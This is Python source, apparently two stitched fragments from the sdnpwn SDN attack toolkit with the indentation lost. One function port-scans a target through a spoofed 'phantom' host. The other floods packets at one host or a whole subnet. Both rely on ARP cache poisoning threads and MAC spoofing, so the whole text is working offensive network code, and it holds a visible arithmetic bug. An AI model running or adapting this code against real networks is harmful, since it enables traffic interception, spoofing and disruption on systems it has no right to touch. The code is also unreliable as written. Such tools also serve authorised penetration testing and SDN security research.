def signal_handler(signal, frame):
global runningThreads
sdnpwn.message("Stopping...", sdnpwn.NORMAL)
dpap.stopPoisoning()
while (dpap.isPoisoningComplete() != True):
pass
runningThreads.remove(runningThreads[1])
runningThreads.remove(runningThreads[0])
def run(params):
global scanPrepped
scanPrepped = False
conf.verb = 0 #Set scapy verbose mode off
signal.signal(signal.SIGINT, signal_handler)
interface = None
targetIP = None
targetMAC = None
targetPort = None
phantomIP = None
phantomMAC = None
if ("--iface" in params):
interface = params[params.index("--iface") + 1]
if ("--target-ip" in params):
targetIP = params[params.index("--target-ip") + 1]
if ("--target-mac" in params):
targetMAC = params[params.index("--target-mac") + 1]
if ("--ports" in params):
targetPort = params[params.index("--ports") + 1]
if ("--phantom-ip" in params):
phantomIP = params[params.index("--phantom-ip") + 1]
if ("--phantom-mac" in params):
phantomMAC = params[params.index("--phantom-mac") + 1]
if (interface == None or targetIP == None or targetPort == None
or phantomIP == None):
print(info())
print(usage())
return
if (targetMAC == None):
sdnpwn.message("Sending ARP request for target MAC", sdnpwn.NORMAL)
targetMAC = sdnpwn.getTargetMacAddress(interface, targetIP)
sdnpwn.message("Got target MAC: " + targetMAC, sdnpwn.NORMAL)
if (phantomMAC == None):
phantomMAC = sdnpwn.generateRandomMacAddress()
sdnpwn.message("Generated Phantom host MAC: " + phantomMAC,
sdnpwn.NORMAL)
targetPorts = targetPort.split(",")
sourcePort = getUniqueNum()
tcpSeqNum = getUniqueNum()
thisHostIP = sdnpwn.getIPAddress(interface)
thisHostMAC = sdnpwn.getMacAddress(interface)
if ((thisHostIP == '0') or (thisHostMAC == '0')):
sdnpwn.message("Invalid interface", sdnpwn.ERROR)
exit(0)
prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC)
while (dpap.isPoisoningComplete() == False):
sleep(2)
sdnpwn.message("Waiting for poisoning to complete...", sdnpwn.NORMAL)
sdnpwn.message("Starting port scan", sdnpwn.SUCCESS)
for p in targetPorts:
scan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC, p)
sleep(2)
sdnpwn.message("Finishing up...", sdnpwn.NORMAL)
dpap.stopPoisoning()
return
def run(params):
conf.verb = 0
interface = None
target = None
targetMAC = None
phantomIP = None
phantomMAC = None
packetCount = 0
targets = {}
try:
if ("--iface" in params):
interface = params[params.index("--iface") + 1]
if ("--target" in params):
target = params[params.index("--target") + 1]
if ("--phantom-ip" in params):
phantomIP = params[params.index("--phantom-ip") + 1]
if ("--phantom-mac" in params):
phantomMAC = params[params.index("--phantom-mac") + 1]
if ("--packets" in params):
packetCount = int(params[params.index("--packets") + 1])
if (interface == None or target == None or packetCount == None
or phantomIP == None):
print(info())
print(usage())
return
if ("/" in target):
sdnpwn.message("Building list of target hosts (may take a minute)",
sdnpwn.NORMAL)
targetNetSplit = target.split("/")
targetNetHostBits = 32 - int(targetNetSplit[1])
targetNetAddress = targetNetSplit[0]
noOfNetworkHosts = (2 ^ targetNetHostBits) - 2
targetNetAddSplit = targetNetAddress.split(".")
#TODO: Change this to support networks with a mask < 24 bits
finalOctetVal = int(targetNetAddSplit[3])
netAddressTemplate = str(targetNetAddSplit[0]) + "." + str(
targetNetAddSplit[1]) + "." + str(targetNetAddSplit[2]) + "."
for i in range(finalOctetVal, noOfNetworkHosts):
try:
targets[netAddressTemplate +
str(i)] = sdnpwn.getTargetMacAddress(
interface, netAddressTemplate + str(i))
except:
pass
sdnpwn.message("Found " + str(len(targets)) + " targets in total",
sdnpwn.NORMAL)
else:
targets[target] = sdnpwn.getTargetMacAddress(interface, target)
except Exception as e:
print(e)
print(info())
print(usage())
return
if (phantomMAC == None):
phantomMAC = sdnpwn.generateRandomMacAddress()
sdnpwn.message("Generated Phantom host MAC: " + phantomMAC,
sdnpwn.NORMAL)
thisHostIP = sdnpwn.getIPAddress(interface)
thisHostMAC = sdnpwn.getMacAddress(interface)
srcPort = random.randint(35000, 60000)
dstPort = random.randint(35000, 60000)
sdnpwn.message("Starting attack", sdnpwn.NORMAL)
for t in targets:
try:
poisoningThread = Thread(target=dpap.arpCachePoison,
args=(interface, t, targets[t], phantomIP,
phantomMAC, thisHostIP, thisHostMAC,
True, 2)).start()
except Exception as e:
sdnpwn.message("Issue starting poisoning thread", sdnpwn.ERROR)
print(e)
return
while (dpap.isPoisoningComplete() == False):
sleep(1)
sdnpwn.message("Starting packet stream to " + t, sdnpwn.NORMAL)
pkt = preparePacket(t, targets[t], dstPort, phantomIP, thisHostMAC,
srcPort)
sendPacket(interface, pkt, packetCount)
sdnpwn.message("Finishing up...", sdnpwn.NORMAL)
dpap.stopPoisoning()
return